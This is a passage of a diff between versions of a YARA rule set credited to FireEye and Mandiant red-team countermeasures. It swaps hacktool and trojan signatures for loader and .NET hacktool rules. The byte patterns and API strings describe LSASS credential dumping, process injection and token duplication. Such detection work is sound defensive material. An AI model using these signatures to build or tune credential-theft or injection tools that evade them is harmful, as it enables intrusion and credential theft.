C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 } - $bytes3 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 } - $bytes4 = { 4C 89 74 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC A0 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? BA 50 00 00 00 C7 05 ?? ?? ?? ?? 43 00 3A 00 66 89 15 ?? ?? 01 00 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 5C 00 57 00 33 C9 C7 05 ?? ?? ?? ?? 69 00 6E 00 C7 05 ?? ?? ?? ?? 64 00 6F 00 C7 05 ?? ?? ?? ?? 77 00 73 00 C7 05 ?? ?? ?? ?? 5C 00 4D 00 C7 05 ?? ?? ?? ?? 45 00 4D 00 C7 05 ?? ?? ?? ?? 4F 00 52 00 C7 05 ?? ?? ?? ?? 59 00 2E 00 C7 05 ?? ?? ?? ?? 44 00 4D 00 C7 05 ?? ?? ?? ?? 53 00 65 00 C7 05 ?? ?? ?? ?? 44 00 65 00 C7 05 ?? ?? ?? ?? 42 00 75 00 C7 05 ?? ?? ?? ?? 47 00 50 00 C7 05 ?? ?? ?? ?? 72 00 69 00 C7 05 ?? ?? ?? ?? 56 00 69 00 C7 05 ?? ?? ?? ?? 4C 00 45 00 C7 05 ?? ?? ?? ?? 67 00 65 00 C7 05 ?? ?? ?? ?? 6C 73 61 73 C7 05 ?? ?? ?? ?? 73 2E 65 78 C6 05 ?? ?? ?? ?? 65 FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 02 00 00 00 FF 15 ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 ?? 41 8D 56 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 44 24 ?? 4C 89 74 24 ?? 45 33 C9 33 D2 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 0F 1F 44 00 ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 41 B9 04 01 00 00 33 D2 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 ?? 48 89 BC 24 ?? ?? ?? ?? BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 4C 89 74 24 ?? C7 44 24 ?? 80 00 00 00 48 8D 0D ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 01 00 00 00 BA 00 00 00 10 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 ?? 41 B9 02 00 00 00 4C 89 74 24 ?? 4C 8B C7 8B D6 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B C8 FF 15 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? CC 48 8B CB FF 15 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 33 C0 48 8B B4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 48 81 C4 A0 01 00 00 5D C3 } + $typelibguid0 = "8b546b49-2b2c-4577-a323-76dc713fe2ea" ascii nocase wide condition: - uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and any of ($bytes*) + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_2 : FILE +rule FIREEYE_RT_Loader_Win_Generic_20 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "4b7640e8-5621-5cc3-8ac9-84347f23f5eb" + id = "d1d3eff8-d12e-53f6-8c30-06ecedaf3f49" date = "2020-12-02" date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_2.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_20.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4fd62068e591cbd6f413e1c2b8f75442" - logic_hash = "14263c17323cd78df10f7f101bd7a9c74f7818b34a2e42125d45205067399381" + hash = "5125979110847d35a338caac6bff2aa8" + logic_hash = "9611aed2b4e4278d40254cb5c4fe94a458cfa19f10e6fe888bc7ceb166669cc6" score = 75 quality = 75 tags = "FILE" rev = 1 strings: - $api1 = "PssCaptureSnapshot" fullword - $api2 = "MiniDumpWriteDump" fullword - $dump = { C7 [2-5] FD 03 00 AC 4C 8D 4D ?? 41 B8 1F 00 10 00 8B [2-5] 48 8B 4D ?? E8 [4] 89 [2-5] 83 [2-5] 00 74 ?? 48 8B 4D ?? FF 15 [4] 33 C0 E9 [4] 41 B8 10 00 00 00 33 D2 48 8D 8D [4] E8 [4] 48 8D 05 [4] 48 89 85 [4] 48 C7 85 [8] 48 C7 44 24 30 00 00 00 00 C7 44 24 28 80 00 00 00 C7 44 24 20 01 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4] 48 89 85 [4] 48 83 BD [4] FF 75 ?? 48 8B 4D ?? FF 15 [4] 33 C0 EB [0-17] 48 8D [5] 48 89 ?? 24 30 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 41 B9 02 00 00 00 4C 8B 85 [4] 8B [1-5] 48 8B 4D ?? E8 } - $enable_dbg_pri = { 4C 8D 45 ?? 48 8D 15 [4] 33 C9 FF 15 [4] 85 C0 0F 84 [4] C7 45 ?? 01 00 00 00 B8 0C 00 00 00 48 6B C0 00 48 8B 4D ?? 48 89 4C 05 ?? B8 0C 00 00 00 48 6B C0 00 C7 44 05 ?? 02 00 00 00 FF 15 [4] 4C 8D 45 ?? BA 20 00 00 00 48 8B C8 FF 15 [4] 85 C0 74 ?? 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 45 ?? 33 D2 48 8B 4D ?? FF 15 } + $s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 } + $s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 } + $si1 = "VirtualProtect" fullword + $si2 = "malloc" fullword condition: - (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_1 : FILE +rule FIREEYE_RT_Loader_Win_Generic_19 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "e593b589-747d-53c2-a39a-57485e4f7641" - date = "2020-11-30" - date = "2020-11-30" + id = "4f4427ee-0f7d-5442-98a6-402d8b797289" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_1.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_19.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "6a9a114928554c26675884eeb40cc01b" - logic_hash = "aa06628ddef0f95c4217b97a3476a0ee12e00d04c4827a512730598f3c80f1f6" + hash = "3fb9341fb11eca439b50121c6f7c59c7" + logic_hash = "6db9696663c19857c1f89339b8cc9b0565e877f34e8d8cf77b89ef22b3f41683" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 1 strings: - $api1 = "PssCaptureSnapshot" fullword - $api2 = "MiniDumpWriteDump" fullword - $dump = { BA FD 03 00 AC [0-8] 41 B8 1F 00 10 00 48 8B ?? FF 15 [4] 85 C0 0F 85 [2] 00 00 [0-2] 48 8D 05 [5] 89 ?? 24 30 ( C7 44 24 28 80 00 00 00 48 8D 0D ?? ?? ?? ?? | 48 8D 0D ?? ?? ?? ?? C7 44 24 28 80 00 00 00 ) 45 33 C9 [0-5] 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 [0-10] FF 15 [4] 48 8B ?? 48 83 F8 FF ( 74 | 0F 84 ) [1-4] 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 30 ( 41 B9 02 00 00 00 | 44 8D 4D 02 ) ?? 89 ?? 24 28 4C 8B ?? 8B [2] 89 ?? 24 20 FF 15 [4] 48 8B ?? FF 15 [4] 48 8B ?? FF 15 [4] FF 15 [4] 48 8B 54 24 ?? 48 8B C8 FF 15 } - $lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 } + $s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 } + $s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 } + $si1 = "VirtualProtect" fullword + $si2 = "malloc" fullword condition: - (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Trojan_Win64_Generic_23 : FILE +rule FIREEYE_RT_Loader_MSIL_Generic_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "470bfeed-e000-58c6-b115-dfa8aea25bef" - date = "2020-12-02" - date = "2020-12-02" + id = "f919e3fc-cf76-53af-8f04-24921830666f" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_23.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_MSIL_Generic_1.yar#L4-L21" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "b66347ef110e60b064474ae746701d4a" - logic_hash = "4c1860801b26abbab8c4aea730bf69f388c902083b9945e11e6782af3ab22789" + hash = "b8415b4056c10c15da5bba4826a44ffd" + logic_hash = "06cddd7e1c1c778348539cfd50f01d55f86689dec86c045d7ce7b9cd71690e07" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 5 strings: - $api1 = "VirtualAllocEx" fullword - $api2 = "UpdateProcThreadAttribute" fullword - $api3 = "DuplicateTokenEx" fullword - $api4 = "CreateProcessAsUserA" fullword - $inject = { 8B 85 [4] C7 44 24 20 40 00 00 00 41 B9 00 30 00 00 44 8B C0 33 D2 48 8B 8D [4] FF 15 [4] 48 89 45 ?? 48 83 7D ?? 00 75 ?? 48 8B 45 ?? E9 [4] 8B 85 [4] 48 C7 44 24 20 00 00 00 00 44 8B C8 4C 8B 85 [4] 48 8B 55 ?? 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? 48 8B 45 ?? EB ?? 8B 85 [4] 48 8B 4D ?? 48 03 C8 48 8B C1 48 89 45 48 48 8D 85 [4] 48 89 44 24 30 C7 44 24 28 00 00 00 00 48 8B 85 [4] 48 89 44 24 20 4C 8B 4D ?? 41 B8 00 00 10 00 33 D2 48 8B 8D [4] FF 15 } - $process = { 48 C7 44 24 30 00 00 00 00 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 08 00 00 00 4C 8D 8D [4] 41 B8 00 00 02 00 33 D2 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? E9 [4] 48 8B 85 [4] 48 89 85 [4] 48 8D 85 [4] 48 89 44 24 50 48 8D 85 [4] 48 89 44 24 48 48 C7 44 24 40 00 00 00 00 48 C7 44 24 38 00 00 00 00 C7 44 24 30 04 00 08 00 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 05 [4] 33 D2 48 8B [2-5] FF 15 } - $token = { FF 15 [4] 4C 8D 45 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 75 ?? E9 [4] 48 8D [2-5] 48 89 44 24 28 C7 44 24 20 02 00 00 00 41 B9 02 00 00 00 45 33 C0 BA 0B 00 00 00 48 8B 4D ?? FF 15 [4] 85 C0 75 ?? E9 [4] 4C 8D 8D [4] 45 33 C0 BA 01 00 00 00 33 C9 FF 15 } + $MSIL = "_CorExeMain" + $opc1 = { 00 72 [4] 0A 72 [4] 0B 06 28 [4] 0C 12 03 FE 15 [4] 12 04 FE 15 [4] 07 14 } + $str1 = "DllImportAttribute" + $str2 = "FromBase64String" + $str3 = "ResumeThread" + $str4 = "OpenThread" + $str5 = "SuspendThread" + $str6 = "QueueUserAPC" condition: - (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and $MSIL and all of them } -rule FIREEYE_RT_Trojan_Win64_Generic_22 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNFS_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnfs' project." author = "FireEye" - id = "e79661a8-5254-5e8e-b92b-edf1ddb072ff" - date = "2020-11-26" - date = "2020-11-26" + id = "b9d1b4e8-644a-5611-85e8-a124f915b443" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_22.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNFS_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "f7d9961463b5110a3d70ee2e97842ed3" - logic_hash = "52fbe5c0ee7c05df5fcd62c26caaa5498e32352da9c5940e522aa31d6c808028" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "e7f9883376b153849970599d9ecc308882eb86a67834cfd8ab06b44539346125" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 2 + rev = 3 strings: - $api1 = "VirtualAllocEx" fullword - $api2 = "UpdateProcThreadAttribute" fullword - $api3 = "DuplicateTokenEx" fullword - $api4 = "CreateProcessAsUserA" fullword - $inject = { C7 44 24 20 40 00 00 00 33 D2 41 B9 00 30 00 00 41 B8 [4] 48 8B CB FF 15 [4] 48 8B F0 48 85 C0 74 ?? 4C 89 74 24 20 41 B9 [4] 4C 8D 05 [4] 48 8B D6 48 8B CB FF 15 [4] 85 C0 75 [5-10] 4C 8D 0C 3E 48 8D 44 24 ?? 48 89 44 24 30 44 89 74 24 28 4C 89 74 24 20 33 D2 41 B8 [4] 48 8B CB FF 15 } - $process = { 89 74 24 30 ?? 8D 4C 24 [2] 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 [4] 85 C0 0F 84 [4] 48 8B [2-3] 48 8D 45 ?? 48 89 44 24 50 4C 8D 05 [4] 48 8D 45 ?? 48 89 7D 08 48 89 44 24 48 45 33 C9 ?? 89 74 24 40 33 D2 ?? 89 74 24 38 C7 44 24 30 04 00 08 00 [0-1] 89 74 24 28 ?? 89 74 24 20 FF 15 } - $token = { FF 15 [4] 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 0F 84 [4] 48 8B 4C 24 ?? 48 8D [2-3] 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 [4] 85 C0 0F 84 [4] 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 01 FF 15 } + $typelibguid0 = "9f67ebe3-fc9b-40f2-8a18-5940cfed44cf" ascii nocase wide condition: - (( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B)) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_Keefarce_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPWEBCRAWLER_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeeFarce' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpwebcrawler' project." author = "FireEye" - id = "c17add0c-e09f-5ced-a4e1-bf60afad4725" + id = "29b2a410-bcc4-58df-b192-7a413b3db1c0" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = 